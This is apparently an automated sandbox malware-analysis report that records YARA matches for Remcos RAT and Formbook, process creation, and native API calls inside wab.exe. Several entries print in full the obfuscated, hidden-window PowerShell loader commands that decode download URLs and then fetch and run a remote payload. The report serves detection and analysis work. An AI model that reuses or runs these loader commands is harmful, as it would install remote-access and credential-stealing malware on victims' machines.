Source: Yara match	File source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_7860.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_8084.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 0000001E.00000002.4222881972.0000000003F90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001A.00000002.2858446917.00000000229A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001A.00000002.2858446917.00000000233A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001E.00000002.4222881972.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7860, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 4336
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4360
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 4400
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4400
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 4336	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4360	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 4400	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4400

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,	Jump to behavior

Abnormal high CPU Usage

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	17_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00401806 NtdllDefWindowProc_W,	17_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_004018C0 NtdllDefWindowProc_W,	17_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_004016FD NtdllDefWindowProc_A,	18_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 18_2_004017B7 NtdllDefWindowProc_A,	18_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00402CAC NtdllDefWindowProc_A,	19_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00402D66 NtdllDefWindowProc_A,	19_2_00402D66
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC35C0 NtCreateMutant,LdrInitializeThunk,	26_2_21CC35C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2B60 NtClose,LdrInitializeThunk,	26_2_21CC2B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2DF0 NtQuerySystemInformation,LdrInitializeThunk,	26_2_21CC2DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2C70 NtFreeVirtualMemory,LdrInitializeThunk,	26_2_21CC2C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC3090 NtSetValueKey,	26_2_21CC3090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC3010 NtOpenDirectoryObject,	26_2_21CC3010
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC4340 NtSetContextThread,	26_2_21CC4340
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC4650 NtSuspendThread,	26_2_21CC4650
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC39B0 NtGetContextThread,	26_2_21CC39B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2BE0 NtQueryValueKey,	26_2_21CC2BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2BF0 NtAllocateVirtualMemory,	26_2_21CC2BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2B80 NtQueryInformationFile,	26_2_21CC2B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2BA0 NtEnumerateValueKey,	26_2_21CC2BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2AD0 NtReadFile,	26_2_21CC2AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2AF0 NtWriteFile,	26_2_21CC2AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2AB0 NtWaitForSingleObject,	26_2_21CC2AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2DD0 NtDelayExecution,	26_2_21CC2DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2DB0 NtEnumerateKey,	26_2_21CC2DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC3D70 NtOpenThread,	26_2_21CC3D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2D00 NtSetInformationFile,	26_2_21CC2D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC3D10 NtOpenProcessToken,	26_2_21CC3D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2D10 NtMapViewOfSection,	26_2_21CC2D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2D30 NtUnmapViewOfSection,	26_2_21CC2D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2CC0 NtQueryVirtualMemory,	26_2_21CC2CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2CF0 NtOpenProcess,	26_2_21CC2CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2CA0 NtQueryInformationToken,	26_2_21CC2CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2C60 NtCreateKey,	26_2_21CC2C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2C00 NtQueryInformationProcess,	26_2_21CC2C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2FE0 NtCreateFile,	26_2_21CC2FE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2F90 NtProtectVirtualMemory,	26_2_21CC2F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2FA0 NtQuerySection,	26_2_21CC2FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2FB0 NtResumeThread,	26_2_21CC2FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2F60 NtCreateProcessEx,	26_2_21CC2F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2F30 NtCreateSection,	26_2_21CC2F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2EE0 NtQueueApcThread,	26_2_21CC2EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2E80 NtReadVirtualMemory,	26_2_21CC2E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2EA0 NtAdjustPrivilegesToken,	26_2_21CC2EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2E30 NtWriteVirtualMemory,	26_2_21CC2E30

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B70BE92	2_2_00007FFD9B70BE92
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B70B0E6	2_2_00007FFD9B70B0E6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B706E6D	2_2_00007FFD9B706E6D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0468EF68	5_2_0468EF68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0468F838	5_2_0468F838
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0468EC20	5_2_0468EC20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0747C998	5_2_0747C998
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D7B5C1	10_2_23D7B5C1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D87194	10_2_23D87194
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044B040	17_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0043610D	17_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_00447310	17_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044A490	17_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0040755A	17_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0043C560	17_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_0044B610	17_2_0044B610
